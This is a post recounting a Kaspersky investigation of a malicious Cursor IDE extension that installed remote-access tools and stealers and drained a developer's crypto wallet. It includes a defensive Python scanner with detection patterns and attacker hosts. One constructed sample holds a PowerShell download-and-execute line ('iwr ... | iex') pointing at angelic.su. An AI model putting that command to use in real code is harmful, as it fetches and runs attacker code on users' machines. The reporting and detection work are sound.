
Vladimir S. | Officer's Notes|Jul 15, 2025 18:00
Researchers from @kaspersky Lab have shared the results of their investigation into an incident involving a blockchain developer who fell victim to a scam.
It turned out that a fake extension for the @cursor_ai IDE code editor infected the device with remote access tools and info stealers, which led to the theft of 500,000 in cryptocurrency from the developer.
Cursor AI IDE is an AI-based development environment built on Microsoft’s Visual Studio Code. It includes support for Open VSX, an alternative to the Visual Studio Marketplace, allowing the installation of VSCode-compatible extensions to enhance the software's functionality.
Notably, the victim's operating system was installed just a few days before the incident. Only the most essential and popular programs were loaded onto the infected device. However, it was reported that no antivirus software was installed, and free online services were used.
After obtaining a disk image of the device and analyzing it, Kaspersky researchers discovered a malicious JavaScript file named extension.js located in the .cursor/extensions directory.
The extension was called Solidity Language and was published in the Open VSX registry. It was claimed to be a syntax highlighting tool for working with Ethereum smart contracts.
Despite masquerading as a legitimate Solidity syntax highlighting extension, the plugin actually executed a PowerShell script from a remote host, angelic[.]su, to download additional malicious payloads.
The remote PowerShell script checked if ScreenConnect was already installed, and if not, it launched another script to install it. After that, the attackers gained full remote access to the developer's computer.
Using ScreenConnect, they uploaded and executed VBScript files that were used to download additional payloads onto the device.
The final attack script downloaded a malicious executable from archive[.]org, containing a loader known as VMDetector, which installed Quasar RAT (capable of executing commands on devices) and PureLogs stealer (which steals credentials and authentication cookies from web browsers, as well as cryptocurrency wallet data).
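The chain above starts from a single JavaScript file in an extension directory that does something no syntax highlighter needs to do: spawn PowerShell and pull code from a remote host. The following scanner is an added example written for this note, not Kaspersky's tooling and not the real extension.js from the report; it walks the `.cursor/extensions` directory named in the text (and VS Code's `.vscode/extensions`, an assumption), flags process spawning, PowerShell invocation, ScreenConnect references and remote URLs, and matches hosts against the two indicators on the page, angelic[.]su and archive[.]org. The three sample extensions it runs against are constructed stand-ins, and the detection patterns are heuristics, not a signature of the actual malware.

```python
"""Scan locally installed Cursor / VS Code extensions for behaviour a
syntax-highlighting extension should never have: spawning a shell or
PowerShell, fetching code from remote hosts, or referencing a remote-access tool.
Example scanner written for this note; not the vendor's tool."""
import re
import tempfile
from pathlib import Path

# Hosts named in the Kaspersky report (defanged on the page as angelic[.]su / archive[.]org).
KNOWN_BAD_HOSTS = ("angelic.su", "archive.org")

# .cursor/extensions is the path from the report; .vscode/extensions is an assumed VS Code default.
EXTENSION_ROOTS = (Path.home() / ".cursor" / "extensions",
                   Path.home() / ".vscode" / "extensions")

# Heuristic indicators; each is True/False per extension.
CHECKS = {
    "spawns_process": re.compile(r"\b(child_process|execSync|spawnSync|spawn|exec)\b"),
    "powershell": re.compile(r"powershell(\.exe)?|\bpwsh\b", re.IGNORECASE),
    "encoded_command": re.compile(r"-(enc|encodedcommand)\b", re.IGNORECASE),
    "screenconnect": re.compile(r"screenconnect", re.IGNORECASE),
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def scan_source(text: str) -> dict:
    """Return the indicators found in one JavaScript source text."""
    found = {name: bool(rx.search(text)) for name, rx in CHECKS.items()}
    hosts = sorted({m.group(1).lower().rstrip(".") for m in URL_RE.finditer(text)})
    found["remote_hosts"] = hosts
    found["known_bad_hosts"] = [h for h in hosts
                                if any(h == b or h.endswith("." + b) for b in KNOWN_BAD_HOSTS)]
    return found


def verdict(found: dict) -> str:
    """Known-bad host -> malicious; process spawning plus PowerShell or any remote host -> suspicious."""
    if found["known_bad_hosts"]:
        return "malicious"
    if found["spawns_process"] and (found["powershell"] or found["remote_hosts"]):
        return "suspicious"
    return "clean"


def scan_extension_dir(root: Path) -> list:
    """Scan every extension directory under root; returns (extension name, verdict, findings)."""
    report = []
    if not root.is_dir():
        return report
    for ext_dir in sorted(p for p in root.iterdir() if p.is_dir()):
        merged = {name: False for name in CHECKS}
        merged["remote_hosts"], merged["known_bad_hosts"] = [], []
        for js in ext_dir.rglob("*.js"):  # merge findings over all JS files of the extension
            f = scan_source(js.read_text(errors="replace"))
            for name in CHECKS:
                merged[name] = merged[name] or f[name]
            merged["remote_hosts"] = sorted(set(merged["remote_hosts"]) | set(f["remote_hosts"]))
            merged["known_bad_hosts"] = sorted(set(merged["known_bad_hosts"]) | set(f["known_bad_hosts"]))
        report.append((ext_dir.name, verdict(merged), merged))
    return report


# Constructed sample extensions (NOT the real extension.js from the report).
SAMPLES = {
    "publisher.solidity-lang-0.0.1": r"""
const { execSync } = require('child_process');
function activate(ctx) {
  // constructed stand-in for the behaviour described in the report
  execSync('powershell.exe -NoProfile -c "iwr https://angelic.su/stage1.ps1 | iex"');
}
module.exports = { activate };
""",
    "publisher.updater-0.3.0": r"""
const { spawn } = require('child_process');
function activate(ctx) { spawn('curl', ['https://updates.example.com/x']); }  // constructed
module.exports = { activate };
""",
    "publisher.honest-highlighter-1.2.0": r"""
const vscode = require('vscode');
function activate(ctx) {
  ctx.subscriptions.push(vscode.languages.registerHoverProvider('solidity',
    { provideHover() { return null; } }));
}
module.exports = { activate };
""",
}


def demo() -> list:
    """Write the constructed samples into a temp extension root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, src in SAMPLES.items():
            (root / name).mkdir()
            (root / name / "extension.js").write_text(src)
        return scan_extension_dir(root)


if __name__ == "__main__":
    for name, v, f in demo():
        print(f"[demo] {name}: {v} {f['known_bad_hosts'] or f['remote_hosts']}")
    for root in EXTENSION_ROOTS:  # then the real extension directories, if present
        for name, v, f in scan_extension_dir(root):
            if v != "clean":
                print(f"{root}: {name}: {v} hosts={f['remote_hosts']}")
```

Run it as-is to see the three constructed verdicts, then check the output for your own extension roots; anything rated "suspicious" deserves a manual read of its JavaScript, since legitimate extensions do occasionally shell out or download updates, while a "malicious" hit on one of the report's hosts warrants isolating the machine and rotating every credential and wallet key it held.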
According to Kaspersky Lab, Open VSX showed that the extension was downloaded 54,000 times before it was removed on July 2. However, researchers believe that the number of installations was artificially inflated to give it an appearance of legitimacy.
The day after, the attackers published a nearly identical version called solidity, increasing the installation count of this extension to nearly two million.
By gaming the ranking algorithm with inflated installation numbers, the attackers pushed their extension above legitimate ones in Open VSX search results, which is why the victim installed the malicious extension, mistaking it for a legitimate one.
Researchers also found similar extensions in the Microsoft Visual Studio Code store under the names solaibot, among-eth, and blankebesxstnion, which also executed PowerShell scripts to install ScreenConnect and info stealers.
Malicious open-source packages continue to pose a serious threat to the crypto industry and remain an attractive way for attackers to profit, as many projects today rely on open-source tools.